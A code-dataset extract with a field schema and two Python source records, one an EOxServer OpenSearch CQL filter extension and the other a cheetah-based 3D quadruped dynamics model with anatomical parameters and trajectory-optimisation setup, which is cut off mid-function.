Dataset schema:

| field | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
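The schema describes one row per source file: repository metadata for the most-starred, most-issues, and most-forked mirrors of the file, the raw `content`, and a battery of per-file quality signals. A minimal sketch of loading and filtering such rows, assuming they are materialized as a Parquet file named `data.parquet` (the storage format is not specified in this extract):

```python
# Hypothetical loading sketch; "data.parquet" is an assumed filename.
import pandas as pd

df = pd.read_parquet("data.parquet")

# Keep small, starred Python files (max_stars_count may be null).
subset = df[
    (df["lang"] == "Python")
    & (df["size"] < 50_000)
    & (df["max_stars_count"].fillna(0) > 0)
]
for _, row in subset.head(3).iterrows():
    print(row["max_stars_repo_name"], row["max_stars_repo_path"], row["size"])
```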
hexsha: af1cd328ee95b3ce28045b665a6e2190194f9a9c | size: 2,849 | ext: py | lang: Python
max_stars: count 25, events 2015-08-10T19:34:34.000Z → 2021-02-05T08:28:01.000Z; path eoxserver/services/opensearch/extensions/cql.py, repo kalxas/eoxserver, head 8073447d926f3833923bde7b7061e8a1658dee06, licenses ["OML"]
max_issues: count 153, events 2015-01-20T08:35:49.000Z → 2022-03-16T11:00:56.000Z; same path/repo/head/licenses as max_stars
max_forks: count 10, events 2015-01-23T15:48:30.000Z → 2021-01-21T15:41:18.000Z; same path/repo/head/licenses as max_stars
content:
```python
# ------------------------------------------------------------------------------
#
# Project: EOxServer <http://eoxserver.org>
# Authors: Fabian Schindler <fabian.schindler@eox.at>
#
# ------------------------------------------------------------------------------
# Copyright (C) 2017 EOX IT Services GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies of this Software or works derived from this Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# ------------------------------------------------------------------------------
from eoxserver.core.decoders import kvp
from eoxserver.core.util.xmltools import NameSpace
from eoxserver.services import filters, ecql
class CQLExtension(object):
""" Implementation of the OpenSearch `'EO' extension
<http://docs.opengeospatial.org/is/13-026r8/13-026r8.html>`_.
"""
namespace = NameSpace(
"http://a9.com/-/opensearch/extensions/cql/1.0/", "cql"
)
def filter(self, qs, parameters):
mapping, mapping_choices = filters.get_field_mapping_for_model(qs.model)
decoder = CQLExtensionDecoder(parameters)
cql_text = decoder.cql
if cql_text:
ast = ecql.parse(cql_text)
filter_expressions = ecql.to_filter(ast, mapping, mapping_choices)
qs = qs.filter(filter_expressions)
return qs
def get_schema(self, collection=None, model_class=None):
return (
dict(name="cql", type="cql", profiles=[
dict(
href="http://www.opengis.net/csw/3.0/cql",
title=(
"CQL (Common Query Language) is a query language "
"created by the OGC for the Catalogue Web Services "
"specification."
)
)
]),
)
class CQLExtensionDecoder(kvp.Decoder):
cql = kvp.Parameter(num="?", type=str)
```
avg_line_length: 39.569444 | max_line_length: 80 | alphanum_fraction: 0.614953
qsc_code_*_quality_signal (zero-valued entries omitted): num_words=336, num_chars=2,849, mean_word_length=5.169643, frac_words_unique=0.520833, frac_chars_top_2grams=0.044329, frac_chars_top_3grams=0.01612, frac_chars_digital=0.009507, frac_chars_whitespace=0.22464, size_file_byte=2,849, num_lines=71, num_chars_line_max=81, num_chars_line_mean=40.126761, frac_chars_alphabet=0.776822, frac_chars_comments=0.532117, frac_chars_string_length=0.156347
qsc_codepython_*_quality_signal: cate_ast=1, frac_lines_func_ratio=0.064516, cate_var_zero=false, frac_lines_pass=0, frac_lines_import=0.096774, frac_lines_simplefunc=0.032258, score_lines_no_logic=0.354839, frac_lines_print=0
unsuffixed duplicate qsc_* columns: all 0 (frac_words_unique and frac_lines_string_concat are null) | effective: 1 | hits: 0
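The summary columns can be sanity-checked against `content`. A sketch under the assumption that `avg_line_length`, `max_line_length`, and `alphanum_fraction` have their obvious definitions; the exact tokenization behind the `qsc_*` signals is not given here:

```python
# Recompute the three summary columns from a file's text (assumed
# definitions: mean/max characters per line, alphanumeric fraction).
def summary_stats(content: str) -> dict:
    lines = content.splitlines() or [""]
    return {
        "avg_line_length": sum(len(l) for l in lines) / len(lines),
        "max_line_length": max(len(l) for l in lines),
        "alphanum_fraction": sum(c.isalnum() for c in content) / max(len(content), 1),
    }

# For the cql.py record above, this should land near
# avg_line_length ≈ 39.57, max_line_length = 80, alphanum_fraction ≈ 0.61.
```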
hexsha: af1d6a6d06805cdde1b38ccbd57154e51315542b | size: 31,786 | ext: py | lang: Python
max_stars: count 5, events 2020-09-27T14:00:12.000Z → 2022-01-31T09:06:37.000Z; path examples/quadruped3D.py, repo alknemeyer/physical_education, head 7bcad4111bc153a0c9c080f11a43295bd1d8c425, licenses ["MIT"]
max_issues: count 8, events 2020-09-27T15:02:28.000Z → 2022-03-28T13:51:38.000Z; same path/repo/head/licenses as max_stars
max_forks: count 2, events 2020-09-27T14:01:39.000Z → 2022-01-21T09:47:54.000Z; same path/repo/head/licenses as max_stars
content:
````python
from typing import Any, Dict, Iterable, List, Optional, Tuple, Callable
from math import pi as π
from sympy import Matrix as Mat
from numpy import ndarray
from physical_education.links import Link3D, constrain_rel_angle
from physical_education.system import System3D
from physical_education.foot import add_foot, feet, Foot3D
from physical_education.motor import add_torque
from physical_education.drag import add_drag
from physical_education.spring import add_torquespring
from physical_education.damper import add_torquedamper
parameters = {
# # The model below is terribly out of date. If needed, manually
# # uncomment + test it!
# 'model-6': {
# 'source': """
# A model of cheetah 6 from Functional anatomy of the cheetah (Acinonyx jubatus) forelimb and hindlimb
# doi: 10.1111/j.1469-7580.2011.01344.x and 10.1111/j.1469-7580.2010.01310.x
# """,
# 'body_B': {'mass': 17., 'radius': 0.08, 'length': 0.41},
# 'body_F': {'mass': 8., 'radius': 0.08, 'length': 0.21},
# 'tail0': {'mass': 0.4, 'radius': 0.005, 'length': 0.38},
# 'tail1': {'mass': 0.2, 'radius': 0.005, 'length': 0.38},
# 'front': {
# 'thigh': {'mass': 0.171, 'radius': 0.012, 'length': 0.254},
# 'calf': {'mass': 0.068, 'radius': 0.005, 'length': 0.247},
# },
# 'back': {
# 'thigh': {'mass': 0.210, 'radius': 0.010, 'length': 0.281},
# 'calf': {'mass': 0.160, 'radius': 0.011, 'length': 0.287},
# },
# 'friction_coeff': 1.3,
# 'motor_params': {'torque_bounds': (-2., 2.), 'no_load_speed': 50.},
# },
'mean-male': {
'source': """
Parameters for the 'mean' (X) cheetah from
Morphology, Physical Condition, and Growth of the Cheetah (Acinonyx jubatus jubatus)
https://academic.oup.com/jmammal/article/84/3/840/905900
body mass = 45.6 kg ---> majority (42kg?) in body
chest girth = 71.7 cm ---> front radius = 0.717m / (2*pi)
abdomen girth = 59.4 cm ---> back radius = 0.594m / (2*pi)
skull length = 23.4 cm
body length = 125.5 cm ---> body - skull - neck = 125.5 - 23.4 - (20?) = 80cm => front = 0.5m, back = 0.3m
tail length = 76.7 cm ---> 38cm per half
total length = 202.2 cm
total foreleg length = 77 cm
total hind leg length = 81.1 cm
front foot length = 8.2 cm
front foot width = 6.1 cm
hind foot length = 9.2 cm
hind foot width = 6.2 cm
From "Quasi-steady state aerodynamics of the cheetah tail"
fur length on tail = 10mm on average
average tail diameter (no fur) = 31mm
---> radius = 31/2 + 10 = 25.5mm = 0.0255m
Friction coeff of 1.3 from
"Locomotion dynamics of hunting in wild cheetahs"
NOTE: leg measurements mostly cribbed from 'model-6' above. Find proper values!
lengths = same
masses = same * 1.2
radii = same
NOTE: the motor_params values are mostly made up. In any case, different muscle
groups would need different values
""",
'body_B': {'mass': 28., 'radius': 0.594/(2*π), 'length': 0.3},
'body_F': {'mass': 14., 'radius': 0.717/(2*π), 'length': 0.5},
'tail0': {'mass': 0.4, 'radius': 0.0255, 'length': 0.38},
'tail1': {'mass': 0.2, 'radius': 0.0255, 'length': 0.38},
'front': {
'thigh': {'mass': 0.171*1.2, 'radius': 0.012, 'length': 0.254},
'calf': {'mass': 0.068*1.2, 'radius': 0.005, 'length': 0.247},
},
'back': {
'thigh': {'mass': 0.210*1.2, 'radius': 0.010, 'length': 0.281},
# based on ratios
'calf': {'mass': 0.100*1.2, 'radius': 0.011, 'length': 0.287 * 1.1*(33/(33+24.5))},
# from Liams model
'hock': {'mass': 0.060*1.2, 'radius': 0.011, 'length': 0.287 * 1.1*(24.5/(33+24.5))},
},
'friction_coeff': 1.3,
# measured in terms of body weight, based on the observed limits
# of energy efficient gallops and C-turns at 8, 14 and 20 m/s
# for this model
'motor': {
'spine': {'torque_bounds': (-0.7, 0.7), 'no_load_speed': 50.},
'spine-tail0': {'torque_bounds': (-0.25, 0.25), 'no_load_speed': 50.},
'tail0-tail1': {'torque_bounds': (-0.2, 0.2), 'no_load_speed': 50.},
'front': {
'hip-pitch': {'torque_bounds': (-0.5, 0.6), 'no_load_speed': 50.},
'hip-abduct': {'torque_bounds': (-0.5, 0.6), 'no_load_speed': 50.},
'knee': {'torque_bounds': (-0.5, 0.4), 'no_load_speed': 50.},
},
'back': {
'hip-pitch': {'torque_bounds': (-0.6, 0.6), 'no_load_speed': 50.},
'hip-abduct': {'torque_bounds': (-0.4, 0.5), 'no_load_speed': 50.},
'knee': {'torque_bounds': (-0.1, 0.5), 'no_load_speed': 50.},
'ankle': {'torque_bounds': (-0.4, 0.05), 'no_load_speed': 50.},
},
},
},
}
def model(params: Dict[str, Any], with_tail: bool) -> Tuple[System3D, Callable[[System3D], None]]:
"""
Defines a quadruped model based off a cheetah (see `cheetah-model.png`).
Roughly 400 000 operations in the equations of motion without simplification,
and 140 000 if simplified with
>>> robot.calc_eom(simp_func = lambda x: utils.parsimp(x, nprocs = 14))
Note that the numbers are probably out of date at this point.
"""
# create front and back links of body and tail
body_B = Link3D('base_B', '+x', base=True, **params['body_B'],
meta=['spine', 'back'])
body_F = Link3D('base_F', '+x', start_I=body_B.bottom_I, **params['body_F'],
meta=['spine', 'front'])
# input torques for roll, pitch and yaw of the spine
# body_B.add_hookes_joint(body_F, about='xyz')
add_torque(body_B, body_F, about='xyz', **params['motor']['spine'])
# spring/damper forces on spine
phi_b, th_b, psi_b = body_B.q[3:]
phi_f, th_f, psi_f = body_F.q[:3]
for angles, dof in [(phi_b - phi_f, 'roll'),
(th_b - th_f, 'pitch'),
(psi_b - psi_f, 'yaw')]:
# TODO: actually find these by initialising to 0.5 and bounding to (0.1, 10.)
# the current fixed values are sort of arbitrary (based on a paper)
# about humans
add_torquespring(body_B, body_F, angles, spring_coeff=0.5,
# spring_coeff_lims=(0.1, 10.),
rest_angle=0,
name=f'spine-torquespring-{dof}')
add_torquedamper(body_B, body_F, angles, damping_coeff=0.5,
# damping_coeff_lims=(0.1, 10.),
name=f'spine-torquedamper-{dof}')
# drag on body
add_drag(body_F, at=body_F.bottom_I, name='body_F-drag-head',
use_dummy_vars=True, cylinder_top=True)
add_drag(body_F, at=body_F.Pb_I, name='body_F-drag-body',
use_dummy_vars=True)
add_drag(body_B, at=body_B.Pb_I, use_dummy_vars=True)
if with_tail:
tail0 = Link3D('tail0', '-x', start_I=body_B.top_I,
**params['tail0'], meta=['tail'])
tail1 = Link3D('tail1', '-x', start_I=tail0.bottom_I,
**params['tail1'], meta=['tail'])
# friction coefficient of 0.1 is arbitrary. Worth setting to 0
# in case it speeds things up?
add_foot(tail1, at='bottom', nsides=8, friction_coeff=0.1,
GRFxy_max=0.1, GRFz_max=0.1)
# input torques to tail - pitch and yaw
body_B.add_hookes_joint(tail0, about='xy')
add_torque(body_B, tail0, about='xy', **params['motor']['spine-tail0'])
# torques in the middle of the tail - pitch and yaw
tail0.add_hookes_joint(tail1, about='xy')
add_torque(tail0, tail1, about='xy', **params['motor']['tail0-tail1'])
# drag on tail
add_drag(tail0, at=tail0.Pb_I, use_dummy_vars=True)
add_drag(tail1, at=tail1.Pb_I, use_dummy_vars=True)
def def_leg(body: Link3D, front: bool, right: bool) -> Iterable[Link3D]:
"""Define a leg and attach it to the front/back right/left of `body`.
Only really makes sense when `body` is aligned along the `x`-axis"""
# maybe flip x (or y)
# the model is considered to face along the x axis (so front/back
# refers to changes in the y value).
def mfx(x): return x if front else -x
def mfy(y): return y if right else -y
start_I = body.Pb_I + \
body.Rb_I @ Mat([mfx(body.length/2), mfy(body.radius), 0])
suffix = ('F' if front else 'B') + ('R' if right else 'L')
frontorback_str = 'front' if front else 'back'
rightorleft_str = 'right' if right else 'left'
p = params[frontorback_str]
thigh = Link3D('U'+suffix, '-z', start_I=start_I, **p['thigh'],
meta=['leg', 'thigh', frontorback_str, rightorleft_str])
calf = Link3D('L'+suffix, '-z', start_I=thigh.bottom_I, **p['calf'],
meta=['leg', 'calf', frontorback_str, rightorleft_str])
# next, all of the muscles and their respective limits
muscleparams = params['motor'][frontorback_str]
# input torques: hip pitch and abduct
body.add_hookes_joint(thigh, about='xy')
add_torque(body, thigh, name=f'{frontorback_str}-{rightorleft_str}-hip-pitch',
about='x', **muscleparams['hip-pitch'])
add_torque(body, thigh, name=f'{frontorback_str}-{rightorleft_str}-hip-abduct',
about='y', **muscleparams['hip-abduct'])
thigh.add_revolute_joint(calf, about='y')
add_torque(thigh, calf, about='y', **muscleparams['knee'])
if front:
add_foot(calf, at='bottom', nsides=8,
friction_coeff=params['friction_coeff'],
GRFxy_max=5, GRFz_max=5)
return thigh, calf
else:
hock = Link3D('H'+suffix, '-z', start_I=calf.bottom_I, **p['hock'],
meta=['leg', 'calf', frontorback_str, rightorleft_str])
calf.add_revolute_joint(hock, about='y')
add_torque(calf, hock, about='y', **muscleparams['ankle'])
add_foot(hock, at='bottom', nsides=8,
friction_coeff=params['friction_coeff'],
GRFxy_max=5, GRFz_max=5)
return thigh, calf, hock
ufl, lfl = def_leg(body_F, front=True, right=False)
ufr, lfr = def_leg(body_F, front=True, right=True)
ubl, lbl, hbl = def_leg(body_B, front=False, right=False)
ubr, lbr, hbr = def_leg(body_B, front=False, right=True)
# combine into a robot
tail = [tail0, tail1] if with_tail else [] # type: ignore
robot = System3D('3D quadruped', [body_B, body_F, *tail,
ufl, lfl, ufr, lfr,
ubl, lbl, ubr, lbr,
hbl, hbr])
return robot, add_pyomo_constraints
def has_tail(robot: System3D) -> bool:
return any('tail' in link.name for link in robot.links)
def add_pyomo_constraints(robot: System3D) -> None:
# π/3 = 60 degrees
# π/2 = 90 degrees
# π/4 = 45 degrees
assert robot.m is not None,\
'robot does not have a pyomo model defined on it'
if has_tail(robot):
body_B, body_F, tail0, tail1, \
ufl, lfl, ufr, lfr, \
ubl, lbl, ubr, lbr, \
hbl, hbr = [link['q'] for link in robot.links]
else:
body_B, body_F, \
ufl, lfl, ufr, lfr, \
ubl, lbl, ubr, lbr, \
hbl, hbr = [link['q'] for link in robot.links]
tail0 = tail1 = None
# spine can't bend too much:
constrain_rel_angle(robot.m, 'spine_pitch',
-π/4, body_B[:, :, 'theta'], body_F[:, :, 'theta'], π/4)
constrain_rel_angle(robot.m, 'spine_roll',
-π/4, body_B[:, :, 'phi'], body_F[:, :, 'phi'], π/4)
constrain_rel_angle(robot.m, 'spine_yaw',
-π/4, body_B[:, :, 'psi'], body_F[:, :, 'psi'], π/4)
# tail can't go too crazy:
if tail0 is not None:
constrain_rel_angle(robot.m, 'tail_body_pitch',
-π/3, body_B[:, :, 'theta'], tail0[:, :, 'theta'], π/3)
constrain_rel_angle(robot.m, 'tail_body_yaw',
-π/3, body_B[:, :, 'phi'], tail0[:, :, 'phi'], π/3)
constrain_rel_angle(robot.m, 'tail_tail_pitch',
-π/2, tail0[:, :, 'theta'], tail1[:, :, 'theta'], π/2)
constrain_rel_angle(robot.m, 'tail_tail_yaw',
-π/2, tail0[:, :, 'phi'], tail1[:, :, 'phi'], π/2)
# legs: hip abduction and knee
for body, thigh, calf, hock, name in ((body_F, ufl, lfl, None, 'FL'),
(body_F, ufr, lfr, None, 'FR'),
(body_B, ubl, lbl, hbl, 'BL'),
(body_B, ubr, lbr, hbr, 'BR')):
constrain_rel_angle(robot.m, name + '_hip_pitch',
-π/2, body[:, :, 'theta'], thigh[:, :, 'theta'], π/2)
constrain_rel_angle(robot.m, name + '_hip_abduct',
-π/8, body[:, :, 'phi'], thigh[:, :, 'phi'], π/8)
lo, up = (-π, 0) if name.startswith('B') else (0, π)
constrain_rel_angle(robot.m, name + '_knee',
lo, thigh[:, :, 'theta'], calf[:, :, 'theta'], up)
if hock is not None:
lo, up = (0, π)
constrain_rel_angle(robot.m, name + '_foot',
lo, calf[:, :, 'theta'], hock[:, :, 'theta'], up)
for th in hock[:, :, 'theta']:
th.setub(+π/3)
th.setlb(-π/3)
# common functions
def high_speed_stop(robot: System3D, initial_vel: float, minimize_distance: bool,
gallop_data: Optional[dict] = None, offset: int = 0):
import math
import random
from physical_education.utils import copy_state_init
from physical_education.init_tools import add_costs
if not has_tail(robot):
from physical_education.visual import warn
warn('Need to update high_speed_stop for no tail model!')
nfe = len(robot.m.fe)
ncp = len(robot.m.cp)
total_time = float((nfe-1)*robot.m.hm0.value)
body = robot['base_B']
# start at the origin
body['q'][1, ncp, 'x'].fix(0)
body['q'][1, ncp, 'y'].fix(0)
if gallop_data is not None:
for fed, cpd in robot.indices(one_based=True):
robot.init_from_dict_one_point(
gallop_data, fed=fed, cpd=cpd, fes=(fed-1 + offset) % nfe, cps=0,
skip_if_fixed=True, skip_if_not_None=False, fix=False)
for link in robot.links:
for q in link.pyomo_sets['q_set']:
link['q'][1, ncp, q].fixed = True
link['dq'][1, ncp, q].fixed = True
else:
# init to y plane
body['q'][:, :, 'y'].value = 0
for link in robot.links:
for ang in ('phi', 'psi'):
link['q'][:, :, ang].value = 0
link['dq'][:, :, ang].value = 0
link['ddq'][:, :, ang].value = 0
# roughly bound to y plane
for fe, cp in robot.indices(one_based=True):
body['q'][fe, cp, 'y'].setub(0.2)
body['q'][fe, cp, 'y'].setlb(-0.2)
for link in robot.links:
for ang in ('phi', 'psi'):
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, ang].setub(math.pi/4)
link['q'][fe, cp, ang].setlb(-math.pi/4)
# bound theta
for fe, cp in robot.indices(one_based=True):
for link in robot.links[4:]: # all leg segments - no tail or body
link['q'][fe, cp, 'theta'].setub(math.radians(60))
link['q'][fe, cp, 'theta'].setlb(math.radians(-60))
for link in robot.links[:2]: # two body segments
link['q'][fe, cp, 'theta'].setub(math.radians(45))
link['q'][fe, cp, 'theta'].setlb(math.radians(-45))
for link in robot.links:
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, 'theta'].value = (
math.radians(random.gauss(0, 15)))
body['q'][1, ncp, 'z'].fix(0.6)
# both sides mirrored
for src, dst in (('UFL', 'UFR'), ('LFL', 'LFR'), ('UBL', 'UBR'), ('LBL', 'LBR')):
copy_state_init(robot[src]['q'], robot[dst]['q'])
# init tail to flick?
for link in robot.links[2:4]:
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, 'theta'].value = (
math.radians(random.random()*60))
# stop weird local minimum where it bounces
for fe, cp in robot.indices(one_based=True):
if fe in range(10):
continue
# if fe > nfe/2: continue
height = body['q'][fe, cp, 'z']
height.setub(0.6) # approx. leg height
for foot in feet(robot):
foot['foot_height'][fe, cp].setub(0.01)
# start at speed
body['dq'][1, ncp, 'x'].fix(initial_vel)
# end at rest
for link in robot.links:
for q in link.pyomo_sets['q_set']:
link['dq'][nfe, ncp, q].fix(0)
# end in a fairly standard position
for link in robot.links[:2]: # two body segments
link['q'][nfe, ncp, 'theta'].setub(math.radians(10))
link['q'][nfe, ncp, 'theta'].setlb(math.radians(-10))
for link in robot.links[4:]: # leaving out tail - it might flail, which is good
link['q'][nfe, ncp, 'theta'].setub(math.radians(20))
link['q'][nfe, ncp, 'theta'].setlb(math.radians(-20))
for link in robot.links:
for ang in ('phi', 'psi'):
link['q'][nfe, ncp, ang].setub(math.radians(5))
link['q'][nfe, ncp, ang].setlb(math.radians(-5))
# position and velocity over time
for fe in robot.m.fe:
pos = total_time * (initial_vel/2) * (fe-1)/(nfe-1)
vel = initial_vel * (1 - (fe-1)/(nfe-1))
# print('pos', pos, 'vel', vel)
body['q'][fe, :, 'x'].value = pos
body['dq'][fe, :, 'x'].value = vel
# objective
distance_cost = body['q'][nfe, ncp, 'x'] if minimize_distance else 0
return add_costs(robot, include_transport_cost=False, include_torque_cost=False,
distance_cost=0.0001*distance_cost)
def periodic_gallop_test(robot: System3D,
avg_vel: float,
feet: Iterable['Foot3D'],
foot_order_vals: Iterable[Tuple[int, int]],
init_from_dict: Optional[dict] = None,
at_angle_d: Optional[float] = None
):
"""
foot_order_vals = ((1, 7), (6, 13), (31, 38), (25, 32)) # 14 m/s
"""
from math import sin, cos, radians
import random
from physical_education import utils
from physical_education.foot import prescribe_contact_order
from physical_education.init_tools import sin_around_touchdown, add_costs
from physical_education.constrain import straight_leg, periodic
nfe = len(robot.m.fe)
ncp = len(robot.m.cp)
m = utils.get_pyomo_model_or_error(robot)
total_time = utils.total_time(m)
utils.constrain_total_time(m, total_time=total_time)
body = robot['base_B']
# start at the origin
body['q'][1, ncp, 'x'].fix(0)
body['q'][1, ncp, 'y'].fix(0)
if init_from_dict is None:
if at_angle_d is None or at_angle_d == 0:
# init to y plane
body['q'][:, :, 'y'].value = 0
# running in a straight line
for link in robot.links:
for ang in ('phi', 'psi'):
link['q'][:, :, ang].value = (
radians(at_angle_d or 0) if ang == 'psi' else 0
)
link['dq'][:, :, ang].value = 0
link['ddq'][:, :, ang].value = 0
for fe, cp in robot.indices(one_based=True):
var = robot.links[0]['q'][fe, cp, 'psi']
var.setub(radians((at_angle_d or 0) + 10))
var.setlb(radians((at_angle_d or 0) - 10))
# init theta
def rand(mu, sigma, offset=0):
return radians(random.gauss(mu, sigma)+offset)
for fe, cp in robot.indices(one_based=True):
# body
robot.links[0]['q'][fe, cp, 'theta'].value = rand(0, 15)
robot.links[1]['q'][fe, cp, 'theta'].value = rand(0, 15, +10)
# tail
if has_tail(robot):
robot.links[2]['q'][fe, cp, 'theta'].value = rand(0, 15, -10)
robot.links[3]['q'][fe, cp, 'theta'].value = rand(0, 15, -10)
offset = 2 if has_tail(robot) else 0
for link in robot.links[(2+offset):]: # legs
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, 'theta'].value = rand(0, 30)
# body height
body['q'][:, :, 'z'].value = 0.55
# the feet:
prescribe_contact_order(feet, foot_order_vals)
# strip the '_foot' suffix by slicing: rstrip('_foot') removes characters, not a suffix
for (touchdown, liftoff), foot in zip(foot_order_vals, [f.name[:-len('_foot')] for f in feet]):
lower, upper = foot, 'U' + foot[1:]
straight_leg(robot[upper]['q'], robot[lower]['q'],
[touchdown], state='theta')
angles = sin_around_touchdown(int((touchdown + liftoff)/2),
len(robot.m.fe))
for fe, val in zip(robot.m.fe, angles): # type: ignore
robot[upper]['q'][fe, :, 'theta'].value = val
robot[lower]['q'][fe, :, 'theta'].value = val + \
radians(-15 if upper[1] == 'F' else 15)
# get timestep bounds ready
# [long/short] timesteps in the air
robot.m.hm[:].value = robot.m.hm[1].lb
for start, stop in foot_order_vals:
for fe in range(start, stop+1):
# but [short/long] timesteps while on the ground
robot.m.hm[fe].value = robot.m.hm[fe].ub
else:
if init_from_dict['ncp'] == 1:
for fed, cpd in robot.indices(one_based=True):
robot.init_from_dict_one_point(init_from_dict, fed=fed, cpd=cpd, fes=fed-1, cps=0,
skip_if_fixed=True, skip_if_not_None=False, fix=False)
else:
robot.init_from_dict(init_from_dict)
if not (at_angle_d == 0 or at_angle_d is None):
raise ValueError(
f'TODO: rotate init! Got at_angle_d = {at_angle_d}')
for link in robot.links:
for fe, cp in robot.indices(one_based=True):
phi = link['q'][fe, cp, 'phi']
phi.setub(radians(+15))
phi.setlb(radians(-15))
psi = link['q'][fe, cp, 'psi']
psi.setub(radians(+10 + (at_angle_d or 0)))
psi.setlb(radians(-10 + (at_angle_d or 0)))
# bound theta
# stop the back from going so high!
for link in robot.links[:2]: # body
for fe, cp in robot.indices(one_based=True):
link['q'][fe, cp, 'theta'].setub(radians(+45))
link['q'][fe, cp, 'theta'].setlb(radians(-45))
